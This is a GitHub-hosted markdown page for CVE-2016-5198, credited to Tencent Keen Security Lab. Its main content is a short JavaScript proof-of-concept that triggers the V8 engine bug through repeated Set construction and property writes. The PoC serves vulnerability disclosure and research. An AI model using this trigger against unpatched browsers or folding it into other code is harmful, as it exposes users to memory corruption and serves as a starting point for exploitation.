Skip to content

Latest commit

 

History

History
28 lines (23 loc) · 340 Bytes

CVE-2016-5198.md

File metadata and controls

28 lines (23 loc) · 340 Bytes

CVE-2016-5198

  • Date: Oct 2016
  • Credit: Tencent Keen Security Lab

PoC

function Ctor() {
  n = new Set();
}
function Check() {
  n.xyz = 0x826852f4;
  parseInt();
}
for(var i=0; i<2000; ++i) {
  Ctor();
}
for(var i=0; i<2000; ++i) {
  Check();
}
Ctor();
Check();

Reference